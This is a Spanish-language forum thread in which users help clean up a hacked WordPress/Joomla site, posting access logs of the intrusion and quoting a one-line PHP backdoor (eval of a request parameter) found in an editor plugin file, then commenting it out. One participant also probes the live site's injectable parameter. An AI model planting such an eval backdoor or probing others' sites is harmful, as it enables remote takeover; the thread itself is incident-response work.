Mi Wordpress Hackeado

Iniciado por ka0s, 24 Julio 2014, 18:59 PM

0 Miembros y 1 Visitante están viendo este tema.

MinusFour

#80
Parece que hay una variable ahí que no esta siendo limpiada, una $GET["req"]. Esas entradas simplemente están haciendo un echo, no se si alguien más haya hecho algo.

EDIT: Parece que si puedes hacer XSS por medio del primero, cuarto y quinto link.

ka0s

Cita de: MinusFour en 25 Julio 2014, 04:24 AM
Parece que hay una variable ahí que no esta siendo limpiada, una $GET["req"]. Esas entradas simplemente están haciendo un echo, no se si alguien más haya hecho algo.

Veremos que dice #!drvy de eso.
Yo por lo pronto estoy intentando acceder al panel de admin de Joomla para ver que versión tiene y que cosas está usando... -_-.
Ojala podamos encontrar la vulnerabilidad que han dicho arriba

MinusFour

#82
Cita de: ka0s en 25 Julio 2014, 04:27 AM
Veremos que dice #!drvy de eso.
Yo por lo pronto estoy intentando acceder al panel de admin de Joomla para ver que versión tiene y que cosas está usando... -_-.
Ojala podamos encontrar la vulnerabilidad que han dicho arriba

Seria muy facil subir un script ahi por medio de fopen() y luego simplemente llamarlo a ejecutar.... y puedes hacer lo que tu quieras con eso XD.

ka0s

Cita de: MinusFour en 25 Julio 2014, 04:32 AM
Seria muy facil subir un script ahi por medio de file_get_contents() y luego simplemente llamarlo a ejecutar.... y puedes hacer lo que tu quieras con eso XD.

Trato de intentar entender lo que dices, pero se me complica mucho.
Como puedo corregir eso de la variable que dices?? En que archivo se encuentra?
Gracias Minus

#!drvy

Efectivamente, como ha mencionado @MinusFour, ese archivo ejecuta directamente el php, es vulnerable.

Lo que si he podido aislar es el ataque..

176.31.251.103 - - [06/Jul/2014:21:23:24 -0300] "GET /wp-login.php HTTP/1.1" 200 2827 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:25 -0300] "POST /wp-login.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:26 -0300] "GET /wp-admin/ HTTP/1.1" 200 69338 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:29 -0300] "GET /wp-admin/ HTTP/1.1" 200 69338 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:31 -0300] "GET /wp-admin/theme-editor.php HTTP/1.1" 200 33381 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:32 -0300] "GET /wp-admin/theme-editor.php?file=404.php&theme=wilborada HTTP/1.1" 200 18746 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:33 -0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:34 -0300] "GET /theme-editor.php?file=404.php&theme=wilborada&scrollto=0&updated=true HTTP/1.1" 404 151 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:35 -0300] "POST /wp-content/themes/wilborada/404.php HTTP/1.1" 200 47 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:36 -0300] "GET /wp-content/themes/wilborada/systemcash.php HTTP/1.1" 200 120 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:38 -0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:39 -0300] "GET /theme-editor.php?file=404.php&theme=wilborada&scrollto=0&updated=true HTTP/1.1" 404 3 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"


El atacante obtuvo aceso logueandose, modifico el 404.php del tema, lo abrio y lo volvio a modificar. Tambien se ve el primer acceso a systemcash.php.. despues, hay entradas de bots con UA (Mozilla 3.0) que acceden a el muchisimas veces.

Todos los archivos sospechosos están borrados sin embargo (y no he sido yo) xD

Estoy mirando el archivo ese de joomla.

Saludos

MinusFour

Cita de: ka0s en 25 Julio 2014, 04:36 AM
Trato de intentar entender lo que dices, pero se me complica mucho.
Como puedo corregir eso de la variable que dices?? En que archivo se encuentra?
Gracias Minus

No se de que archivo, solo se que le estan pasando una variable GET y no están escapando los caracteres especiales, por lo que el código se ejecuta. Realmente lo único que he probado es: echo $_SERVER["SERVER_NAME"] para lo cual me trae:

www.wilboradalibros.com.ar

#!drvy

#86
En el archivo litermalmente pone esto:

<?php $post_var "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>

PD: He comentado la linea.. no debería dar mas problemas.

PD2: Como sugerencia, dile a tu amiga que siempre actualice y que use una contraseña mas segura..

Saludos

ka0s

Cita de: #!drvy en 25 Julio 2014, 04:44 AM
En el archivo litermalmente pone esto:

<?php $post_var "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>

PD: He comentado la linea.. no debería dar mas problemas.

Saludos

#!drvy con esto quieres que decir que está TODO SOLUCIONADO?
Me podrías decir qué linea era y de que archivo por favor así miro la línea que has comentado. Me gustaría saber que línea habia antes y compararla con la que has puesto ahora. Despues de semejante post y horas aquí, quiero seguir aprendiendo un poco.

Yo estaba tratando de acceder al Administrador de Joomla, pero no me ha pasado los datos de esa parte, solo la de Wordpress ¬¬ y quería ver que versión tenía instalada. Porque pensé que si la Wordpress tenia la versión vieja, seguramente la de Joomla también y eso repararía el error no creen?

#!drvy

Si se me olvido mencionarlo..

El archivo esta en

peritajedearte/plugins/editors/jckeditor/jckeditor/includes/ckeditor/autoload/startconfig.php

La linea uno contenía lo que puse en el post de arriba, y ahora tiene
Código (php) [Seleccionar]
<?php #$post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>

PD: En teoria esta todo solucionado, aunque con tantas vulnerabilidades eso era un nido de malware xD

Saludos

MinusFour

#89
¿Esa linea es innecesaria? No vay a ser que la ocupen para algo. El eval para que jodidas lo están usando directamente en una variable GET o POST, que puede ser tan importante para enviarlo así.

Por cierto, hay otras entradas que hacen lo mismo. Edit: La 4 y la 5 entrada.